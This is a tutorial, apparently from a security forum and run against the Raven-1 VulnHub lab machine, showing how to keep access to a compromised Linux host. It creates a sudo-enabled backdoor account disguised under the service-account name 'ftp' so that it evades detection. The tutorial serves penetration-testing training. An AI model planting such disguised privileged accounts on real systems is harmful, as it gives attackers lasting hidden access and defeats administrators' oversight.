- Kali Linux OR Parrot OS
- Practical understanding of T*****/IP
- The tutorial were conducted against a compromised Linux Virtual Machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
https://www.vulnhub.com/entry/raven-1,256/
Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.
PART 3. CREATING A PRIVILEGED LOCAL ACCOUNT:
* Take note: You will require “root” permission in order to create a new user account on Linux systems.
The procedure for establishing a favoured local account for backdoor access is a technique that can be utilised to preserve access to a designated system if an individual account password has been altered. However, the creation of a local user account might potentially result in detection on servers that have fewer user and service accounts, as a new user would easily be discerned.
In order to elude detection, we will create a user account possessing a covert moniker. In this instance, we shall craft a user account denoted as “ftp” in order to assimilate as a service account.
We can generate the user account on the target by executing the following:
Code: Select all
useradd -m -s /bin/bash ftpUpon the formation of the account, it is imperative to incorporate the user into the “sudo” assembly, this will grant the user administrative latitude. This can be achieved by implementing the ensuing command:
Code: Select all
usermod -aG sudo ftpPost the integration of the user account into the “sudo” group, it is mandatory to configure a passcode for the account. This can be accomplished by executing the ensuing command:
Code: Select all
passwd ftpUpon stipulating the password, it is possible to enumerate the contents of the /etc/passwd file to confirm that the user account has been incorporated.
TerminalCode: Select all
smmta:x:100:104:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:101:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
ethical:x:1001:1001::/home/ethical:/bin/sh
ftp:x:1002:1002::/home/ftp:/bin/bash
One may now verify the newly-established user account through SSH password authentication. Simultaneously, one can incorporate the generated SSH public key from the first segment into the "authorized_keys" file within the user account's home directory. [Linux Persistence] | VIA SSH KEYS - PART 1
Subsequent to verifying with the server via SSH, it is possible to ascertain that the user account possesses administrative authority by employing the "sudo" command.
TerminalCode: Select all
ftp@ethical:/root$ cd ~
ftp@ethical:~$ sudo apt update
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for ftp:
As illustrated in the aforementioned terminal, the user account exhibits administrative privileges and is capable of executing any directive on the device without engaging in contact with a "root" account.
This account serves as a means for backdoor access whenever the need arises, thereby circumventing the requirement to utilise the "root" account or any other legitimate user accounts on the targeted system, while still ensuring unfettered access to the target.
